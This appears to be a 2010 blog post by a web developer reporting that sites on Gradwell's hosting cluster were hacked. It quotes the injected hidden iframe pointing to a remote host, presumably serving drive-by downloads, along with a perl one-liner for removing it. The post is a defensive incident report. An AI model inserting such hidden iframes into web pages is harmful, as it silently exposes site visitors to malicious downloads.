I woke up this morning to find all my clients' sites hosted at Gradwell have been hacked.

A quick poke around on domainsbyip.com shows that many other sites hosted on Gradwell's cluster have been similarly altered.

The hacker has added some HTML for a hidden iframe which points to a remote site. Presumably this site serves some sort of drive-by download attack.

Here's the code that is either prepended or appended to all .php and .html files:

<iframe src="//gaccess.dynsite.net/blog/wp-content/0wn3d/" style="display:none"></iframe>

I cleaned up the files as soon as I noticed the attack with this one-liner:

find . -name '*.php' -or -name '*.html' | xargs -n1 perl -pi -e "s/\<iframe src\=\"http\:\/\/gaccess\.dynsite\.net\/blog\/wp-content\/0wn3d\/\" style\=\"display:none\"\>\<\/iframe\>//" 

(NB: this should all be on one line)

The files were re-infected an hour or so later. Re-infection seems to have stopped now.

The attacker evidently has access to the entire home directory - not just the apache web root - as library files outside the web root were also affected.

I reported the breach to support and am awaiting the outcome.

Luckily for me, the Primesolid site wasn't affected as I no longer host it at Gradwell.

There's a thread about this on uk.net.providers.gradwell

 

Peter Gradwell says: there must be some sort of exploit in apache itself so we are also looking at that, and it's permissions model.

Update 2010-12-19 10:03

Gradwell have been hacked again this morning.

Exactly the same attack code has been added to all php and html files. Timestamps are updated to 2010-12-19 05:22. :-/

comments powered by Disqus